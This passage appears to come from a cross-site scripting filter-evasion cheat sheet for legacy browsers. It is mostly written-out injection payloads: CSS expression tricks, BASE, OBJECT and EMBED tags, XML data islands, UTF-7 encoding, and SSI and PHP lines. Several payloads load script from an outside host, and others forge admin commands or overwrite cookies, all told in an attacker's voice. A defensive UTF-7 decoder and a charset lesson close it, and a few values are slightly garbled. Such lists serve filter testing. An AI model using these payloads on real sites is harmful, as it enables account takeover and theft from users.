DIV background-image plus extra characters. I built a quick XSS fuzzer to detect any erroneous characters that are allowed after the open parenthesis but before the JavaScript directive in IE and Netscape 8.1 in secure site mode. These are in decimal but you can include hex and add padding of course. (Any of the following chars can be used: 1-32, 34, 39, 160, 8192-8.13, 12288, 65279):
<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

DIV expression. A variant of this was effective against a real world cross site scripting filter using a newline between the colon and "expression":
<DIV STYLE="width: expression(alert('XSS'));">
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

STYLE tags with broken up JavaScript for XSS (this XSS at times sends IE into an infinite loop of alerts):
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

STYLE attribute using a comment to break up expression (thanks to Roman Ivanov for this one):
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

Anonymous HTML with STYLE attribute (IE6.0 and Netscape 8.1+ in IE rendering engine mode don't really care if the HTML tag you build exists or not, as long as it starts with an open angle bracket and a letter):
<XSS STYLE="xss:expression(alert('XSS'))">
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

IMG STYLE with expression (this is really a hybrid of the above XSS vectors, but it really does show how hard STYLE tags can be to parse apart; like above this can send IE into a loop):
exp/*<A STYLE='no\xss:noxss("*//*");xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("XSS"))'>
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

STYLE tag (older versions of Netscape only):
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [NS4]

STYLE tag using background-image:
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

STYLE tag using background:
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

Downlevel-Hidden block (only works in IE5.0 and later and Netscape 8.1 in IE rendering engine mode). Some websites consider anything inside a comment block to be safe and therefore not in need of removal, which allows our Cross Site Scripting vector. Or the system could add comment tags around something to attempt to render it harmless. As we can see, that probably wouldn't do the job:
<!--[if gte IE 4]>
<SCRIPT>alert('XSS');</SCRIPT>
<![endif]-->
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

BASE tag. Works in IE and Netscape 8.1 in safe mode. You need the // to comment out the next characters so you won't get a JavaScript error and your XSS tag will render. Also, this relies on the fact that the website uses dynamically placed images like "images/image.jpg" rather than full paths. If the path includes a leading forward slash like "/images/image.jpg" you can remove one slash from this vector (as long as there are two to begin the comment this will work):
<BASE HREF="javascript:alert('XSS');//">
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

OBJECT tag (if they allow objects, you can also inject virus payloads to infect the users, etc., and the same with the APPLET tag). The linked file is actually an HTML file that can contain your XSS:
<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

Using an OBJECT tag you can embed XSS directly (this is unverified so no browser support is added):
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>

Using an EMBED tag you can embed a Flash movie that contains XSS. Click here for a demo. If you add the attributes allowScriptAccess="never" and allownetworking="internal" it can mitigate this risk (thank you to Jonathan Vanasco for the info):
<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

You can EMBED SVG which can contain your XSS vector. This example only works in Firefox, but it's better than the above vector in Firefox because it does not require the user to have Flash turned on or installed. Thanks to nEUrOO for this one.
<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAwIiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlhTUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

Using ActionScript inside Flash can obfuscate your XSS vector:
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);

XML namespace. The htc file must be located on the same server as your XSS vector:
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://ha.ckers.org/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

XML data island with CDATA obfuscation (this XSS attack works only in IE and Netscape 8.1 in IE rendering engine mode); vector found by Sec Consult while auditing Yahoo:
<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

XML data island with comment obfuscation (this is another take on the same exploit that doesn't use CDATA fields, but rather uses comments to break up the javascript directive):
<XML ID="xss"><I><B>&lt;IMG SRC="javas<!-- -->cript:alert('XSS')"&gt;</B></I></XML>
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

Locally hosted XML with embedded JavaScript that is generated using an XML data island. This is the same as above but instead refers to a locally hosted (must be on the same server) XML file that contains your cross site scripting vector. You can see the result here:
<XML SRC="xsstest.xml" ID=I></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

HTML+TIME in XML. This is how Grey Magic hacked Hotmail and Yahoo!. This only works in Internet Explorer and Netscape 8.1 in IE rendering engine mode, and remember that you need to be between HTML and BODY tags for this to work:
<HTML><BODY>
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
<?import namespace="t" implementation="#default#time2">
<t:set attributeName="innerHTML" to="XSS&lt;SCRIPT DEFER&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;">
</BODY></HTML>
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

Assuming you can only fit in a few characters and it filters against ".js", you can rename your JavaScript file to an image as an XSS vector:
<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

SSI (Server Side Includes) requires SSI to be installed on the server to use this XSS vector. I probably don't need to mention this, but if you can run commands on the server there are no doubt much more serious issues:
<!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'"-->
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

PHP requires PHP to be installed on the server to use this XSS vector. Again, if you can run any scripts remotely like this, there are probably much more dire issues:
<? echo('<SCR)'; echo('IPT>alert("XSS")</SCRIPT>'); ?>
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

IMG embedded commands. This works when the web page where this is injected (like a web board) is behind password protection and that password protection works with other commands on the same domain. This can be used to delete users, add users (if the user who visits the page is an administrator), send credentials elsewhere, etc. This is one of the lesser used but more useful XSS vectors (the browser sends the victim's cookies with the image request, so any state-changing action reachable by GET runs with the victim's privileges):
<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

IMG embedded commands part II. This is more scary because there are absolutely no identifiers that make it look suspicious other than that it is not hosted on your own domain. The vector uses a 302 or 304 (others work too) to redirect the image back to a command. So a normal <IMG SRC="http://badguy.com/a.jpg"> could actually be an attack vector to run commands as the user who views the image link. Here is the .htaccess (under Apache) line to accomplish the vector (thanks to Timo for part of this):
Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

Cookie manipulation. Admittedly this is pretty obscure, but I have seen a few examples where <META is allowed and you can use it to overwrite cookies. There are other examples of sites where instead of fetching the username from a database it is stored inside of a cookie to be displayed only to the user who visits the page. With these two scenarios combined you can modify the victim's cookie, which will be displayed back to them as JavaScript (you can also use this to log people out or change their user states, get them to log in as you, etc.):
<META HTTP-EQUIV="Set-Cookie" Content="USERID=&lt;SCRIPT&gt;alert('XSS')&lt;/SCRIPT&gt;">
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

UTF-7 encoding. If the page that the XSS resides on doesn't provide a page charset header, or any browser that is set to UTF-7 encoding, it can be exploited with the following (thanks to Roman Ivanov for this one). Click here for an example (you don't need the charset statement if the user's browser is set to auto-detect and there is no overriding content-type on the page in Internet Explorer and Netscape 8.1 in IE rendering engine mode). This does not work in any modern browser without changing the encoding type, which is why it is marked as completely unsupported. Watchfire found this hole in Google's custom 404 script:
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]
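The UTF-7 vector above contains no "<" or ">" bytes at all; they only appear once the document is decoded as UTF-7, which is why a page that sends no charset (and so lets the browser guess or be steered) can be exploited while the same bytes read as UTF-8 or Latin-1 are inert. The decoder below is an added example, not code from the original page: it implements the RFC 2152 rules ("+" opens a run of modified base64 carrying UTF-16 code units, "-" closes it, "+-" is a literal plus) and a small helper shows the same body under two charset interpretations. The names decodeUtf7 and bodyAsSeenBy are this example's own.

```javascript
// Added example: a decoder for the UTF-7 vector above, so the effect of a
// missing charset declaration can be reproduced without a browser.
// decodeUtf7 and bodyAsSeenBy are this example's own names.

const B64 = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/';

// RFC 2152 decoding: '+' opens a run of modified base64 holding UTF-16BE code
// units; '-' ends it (and is swallowed); "+-" is a literal '+'. Any other
// character outside a run is taken as itself.
function decodeUtf7(input) {
  let out = '';
  let i = 0;
  while (i < input.length) {
    if (input[i] !== '+') { out += input[i++]; continue; }
    i++;                                        // skip the '+'
    if (input[i] === '-') { out += '+'; i++; continue; }
    let bits = 0, nbits = 0;
    while (i < input.length && B64.indexOf(input[i]) !== -1) {
      bits = (bits << 6) | B64.indexOf(input[i++]);
      nbits += 6;
      if (nbits >= 16) {                          // a full UTF-16 code unit is available
        nbits -= 16;
        out += String.fromCharCode((bits >> nbits) & 0xffff);
        bits &= (1 << nbits) - 1;                 // keep only the leftover bits
      }
    }
    if (input[i] === '-') i++;                    // the terminator is absorbed, not emitted
  }
  return out;
}

// What the same bytes mean under a given charset: only the UTF-7
// interpretation turns "+ADw-" into '<'. (ASCII-range bytes are identical in
// UTF-8 and Latin-1, so those branches just return the body.)
function bodyAsSeenBy(body, charset) {
  return charset.toLowerCase() === 'utf-7' ? decodeUtf7(body) : body;
}

// The page's payload (constructed sample, ASCII only).
const VECTOR = "+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-";
console.log(bodyAsSeenBy(VECTOR, 'utf-7'));   // <SCRIPT>alert('XSS');</SCRIPT>
```

The defensive takeaway follows directly: always emit an explicit charset (Content-Type: text/html; charset=utf-8, and a matching <meta>), because a filter that looks for "<script" in the raw bytes never sees one here, while a browser that settles on UTF-7 does.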
